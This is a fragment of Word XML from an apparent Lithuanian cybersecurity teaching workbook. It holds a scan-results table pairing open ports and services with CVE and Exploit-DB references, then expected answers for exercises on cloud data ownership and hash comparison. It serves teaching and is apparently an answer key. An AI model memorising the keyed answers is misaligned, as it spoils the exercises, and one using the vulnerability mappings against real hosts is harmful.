              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft Windows netbios-ssn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14168B52" w14:textId="5975ED89" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId249">
              <w:r w:rsidR="0C940C5D" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>CVE-2020-7335</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="359A295C" w14:textId="77777777" w:rsidR="00BD6FFD" w:rsidRPr="005A5C28" w:rsidRDefault="1491BDB5" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>EDB-ID:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEB7286" w14:textId="763184D0" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="1491BDB5" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>46926</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="73085827" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B718C7A" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0378143F" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E270E91" w14:textId="6B67A9BF" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>443/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B66C065" w14:textId="02E7FB74" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ssl/https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FEFB5EF" w14:textId="18A63662" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ssl/https</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A238A75" w14:textId="6172A055" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId250">
              <w:r w:rsidR="0C940C5D" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>CVE-2020-2035</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E10F475" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2083956E" w14:textId="2B7F0A04" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="6C6C9678" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="222ABD0A" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0378143F" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CA2FFA0" w14:textId="43B0094E" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>445/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7435728A" w14:textId="5361C49C" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>microsoft-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41781B08" w14:textId="68C07541" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Microsoft-ds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37B1E856" w14:textId="3A5F1D9F" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId251">
              <w:r w:rsidR="0C940C5D" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>CVE-2002-0597</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F2AEA55" w14:textId="6E0042E3" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w14:paraId="4A2338CE" w14:textId="77777777" w:rsidTr="564132E3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="578" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CD56066" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0378143F" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="87"/>
              </w:numPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="746" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40DFE49F" w14:textId="1B12EE69" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>902/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4050F402" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ssl/vmware-auth</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6852911C" w14:textId="7CADBD9A" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>ideafarm-door</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="890" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4295C7D9" w14:textId="304FA4B9" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>VMware Authentication Daemon 1.10 (Uses VNC, SOAP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="967" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0720A029" w14:textId="47D5B9AF" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="008F04A2" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId252">
              <w:r w:rsidR="0C940C5D" w:rsidRPr="005A5C28">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:u w:val="none"/>
                </w:rPr>
                <w:t>CVE-2020-9746</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="930" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00C212A3" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30519D34" w14:textId="77777777" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09ACED96" w14:textId="4608B141" w:rsidR="00EC2CC0" w:rsidRPr="005A5C28" w:rsidRDefault="0C940C5D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="423B687C" w14:textId="2BBBA7FE" w:rsidR="009A5319" w:rsidRPr="005A5C28" w:rsidRDefault="009A5319" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C58C182" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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7 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SOCIALINIAI TINKLAI, DUOMENŲ SAUGOJIMAS DEBESYJE. KAM PRIKLAUSO JŪSŲ DUOMENYS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF0913B" w14:textId="77777777" w:rsidR="008B0B0B" w:rsidRPr="005A5C28" w:rsidRDefault="008B0B0B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYMAI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77504FEB" w14:textId="5B518581" w:rsidR="00A76B89" w:rsidRPr="005A5C28" w:rsidRDefault="00A76B89" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Atviri klausimai. Mokiniai turėtų pateikti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>individualius</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atsakymus, paremtus</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asmenine patirtimi, žiniomis, supratimu, gebėjimais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF25DBD" w14:textId="5F16D272" w:rsidR="00A76B89" w:rsidRPr="005A5C28" w:rsidRDefault="00A76B89" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481B6DDB" w14:textId="77777777" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38860C96" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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8 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>DUOMENŲ PALYGINIMAS SU MAIŠOS SEKA (ANGL. HASH)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA661AF" w14:textId="77777777" w:rsidR="008B0B0B" w:rsidRPr="005A5C28" w:rsidRDefault="008B0B0B"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA25451" w14:textId="5B66C932" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00A76B89" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:t>Darbo eiga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C8F433" w14:textId="63E80A77" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Sukurkite tekstinį dokumentą</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ir jį išsaugokite vardu hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575D5E6" w14:textId="77C6D24F" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="00955AA7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kompiuteryje ieškokite Užrašinės programos ir ją atidarykite</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F4C25" w14:textId="7B882C80" w:rsidR="000E1002" w:rsidRPr="005A5C28" w:rsidRDefault="000E1002" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
